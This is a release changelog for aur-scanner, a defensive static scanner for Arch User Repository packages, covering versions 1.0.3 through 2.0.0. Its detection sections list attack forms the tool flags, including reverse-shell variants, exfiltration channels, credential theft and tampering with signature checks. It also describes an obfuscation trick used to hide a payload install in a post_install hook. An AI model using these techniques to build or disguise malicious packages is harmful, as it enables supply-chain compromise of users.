Kief Studio aur‑scanner

Changelog

Current channels: stable 2.0.0 (aur-scanner / ks-aur-scanner). See Install for how the channels differ. Every release tag is GPG-signed — verify with git verify-tag v<version>.

This page tracks notable changes. The format follows Keep a Changelog; full per-release notes live on GitHub Releases.

2.0.0 — 2026-06-17 (stable)

Major release. Promotes the 1.2.0-rc1 line to stable. The default scan is unchanged — fully offline and static; everything new is opt-in or additive. Install with paru -S aur-scanner.

Added — opt-in threat intelligence

  • VirusTotal & URLhaus lookups. With enable_threat_intel set and your own key, the scanner checks declared sha256sums against VirusTotal and source= URLs against abuse.ch/URLhaus, emitting TI-VT-001 / TI-URLHAUS-001 on a malicious verdict. Off by default — only already-public hashes/URLs are sent, every lookup fails open, and all egress is isolated in one auditable file. See Threat Intelligence. The VirusTotal-by-hash idea came from @SuitablyMysterious (#9).
  • Active verdict cache. The per-user, MAC-authenticated cache now backs threat-intel lookups so repeat scans respect VirusTotal’s request quota; transient failures are never cached as a verdict.

Added — broader coverage & integrations

  • Every maintained AUR helper is covered by the system audit and the pacman hook — yay, paru, pikaur, aura, pakku, trizen, aurutils, rua, pat-aur — at each helper’s real PKGBUILD location. The shell integration also wraps pikaur/trizen/pakku alongside paru/yay.
  • Nushell integration (install/integration.nu) joins bash/zsh/fish.
  • --no-color global flag (and NO_COLOR env) for clean output in logs/CI.

Changed

  • -c/--config now applies to every command, including system — so a threat-intel config can VT-check every installed AUR package, not just scan.

1.2.0-rc1 — 2026-06-17 (release candidate — promoted to 2.0.0)

The release candidate that became 2.0.0 above. Lived in the repository while it baked, then shipped as stable 2.0.0.

1.1.0 — 2026-06-15 (stable)

Stable. Promotes the 1.1.0 release-candidate line and adds a second hardening wave that closes the residual evasion classes from an adversarial self-audit. Install with paru -S aur-scanner.

Detection — evasion classes closed

  • Variable-indirection (taint pass). A fetch/exec hidden behind a shell variable now resolves and is flagged — it used to trip nothing.
  • Case-insensitive analyzers, host-aware URL/IOC matching, and a supply-chain / packaging-metadata analyzer (dependency confusion, core-package displacement, signature theatre, sensitive backup=, malformed hashes).
  • Quote-aware printed-message filtering (a ; inside a quoted echo no longer false-positives).

Hardening

  • Authenticated cache verdicts (per-user MAC), an allowlisted makepkg build environment, --force can never override an unscannable package, and --local only attributes a verdict to a name that provably matches.

Quality

  • A self-adversarial evasion fuzzer runs as a release gate — every malicious fixture is mutated through semantics-preserving evasion transforms and the gate must still block each variant.

Threat reports that informed this line: #2 (@LunarEclipse363) and #10 (@zebulon2).

1.1.0-rc2 — 2026-06-14 (release candidate)

Proactive detection expansion, prompted by a live obfuscated AUR campaign. Try it with paru -S aur-scanner-rc.

Anti-evasion

  • De-obfuscation pass. A new wave hid a bun add <js-payload> in a post_install hook using ANSI-C quoting ($'\x63') and adjacent-quote word-splitting ("b"'u''n') — the previous RC caught it only as a generic high “hex payload.” The scanner now decodes ANSI-C escapes and collapses quote-splitting, then runs every rule against the decoded text, so the whole catalog resists this evasion at once. That sample is now correctly flagged critical.

Detection — catalog 72 → 106 codes

  • Reverse/bind shells beyond bash/nc: perl, php, ruby/lua/awk, node, openssl s_client, mkfifo backpipe, busybox-nc/telnet/ncat-ssl.
  • Exfiltration: DNS tunnelling, HTTP upload, Slack/Teams webhooks, anonymous file-drop/tunnel hosts, environment dumps, cloud/CI credential + keyring/wallet access.
  • Auth & system tampering: privileged-account creation, password changes, writes to the auth database, doas/NOPASSWD, PAM, pacman SigLevel=Never, disabling security controls, rogue CA trust anchors.
  • Supply-chain trust: pacman-key / gpg key imports, package-index overrides, obfuscated IPs in source URLs.
  • More obfuscation & RCE forms: printf assembly, base32/16 decode, interpreter here-strings, sh -c "$(curl)", detached setsid/nohup.

Other

  • aur-scan install cleans up its own build directory after a successful install (--keep-build to retain).

1.1.0-rc1 — 2026-06-13 (release candidate)

Security-hardening release resolving a full security & quality audit. Try it with paru -S aur-scanner-rc; read the behavior changes before pointing automation at it.

⚠️ Behavior changes (read before upgrading)

  • The scanner now fails closed. The paru/yay wrapper and the pacman hook previously continued past a fetch/scan error, a timeout, or a non-interactive prompt; they now deny in those cases. If you drive paru/yay from a script, cron, or CI (no TTY), an install that can’t be fully analyzed is refused rather than silently proceeding. A security gate that fails open is not a gate.
  • scan --format json / --format sarif emit only the machine document on stdout. The human-readable summary moved to stderr, so aur-scan scan --format json | jq works. If you scraped the summary out of stdout, read stderr instead.

Security

  • Input-validation chokepoint for package names/bases — illegal identifiers are rejected before they can become URL path segments or filesystem paths, closing a path-traversal vector and request-injection into the AUR RPC.
  • Network hardening: redirects refused, HTTPS-only enforced, response bodies size-capped (streaming), all RPC URLs percent-encoded.
  • Pacman hook drops root (groups → gid → uid, verified irreversible) before reading user cache files, validates names, and refuses symlinked PKGBUILDs.
  • Detection-evasion fixes: backslash-newline line-continuation splicing; quote- and comment-aware brace scanning (no more echo "}" / # } truncation); broadened reverse-shell and bare crypto-address detection; checksum SKIP-laundering closed across all hash arrays.
  • Dependency advisory RUSTSEC-2026-0007 resolved (bytes → 1.11.1).

Added

  • SRC-007: warns when a VCS source isn’t pinned to a commit (Low).
  • CLI integration suite that runs the real binary against PKGBUILD fixtures.
  • CI (format, clippy-as-error, tests, release build) and cargo-deny supply-chain gating, plus a weekly advisory scan.
  • The rolling aur-scanner-git package now verifies the signed HEAD commit at build time.

Fixed

  • False positive: a printed note "...~/.config/..." message no longer trips HIDDEN-001 (it mentions a path; it doesn’t write one) — seen on google-chrome and visual-studio-code-bin.
  • Parser: source+=(...) appends are no longer dropped; inline comments are handled quote-aware; single-line function bodies are captured.
  • Cache writes are atomic (0600) in an owner-only (0700) directory, entries are key-bound, and a corrupt entry is a miss rather than trusted data.
  • Provenance store distinguishes an absent baseline from a corrupt one.
  • Removed a panicking AurClient::default() and a response unwrap.

1.0.3 and earlier

Released before this changelog was introduced. See the GitHub Releases for 1.0.3 (race-free install, dependency-tree SBOM), 1.0.1 (INSTALL-004 — language package managers in install hooks), and 1.0.0 (first public release).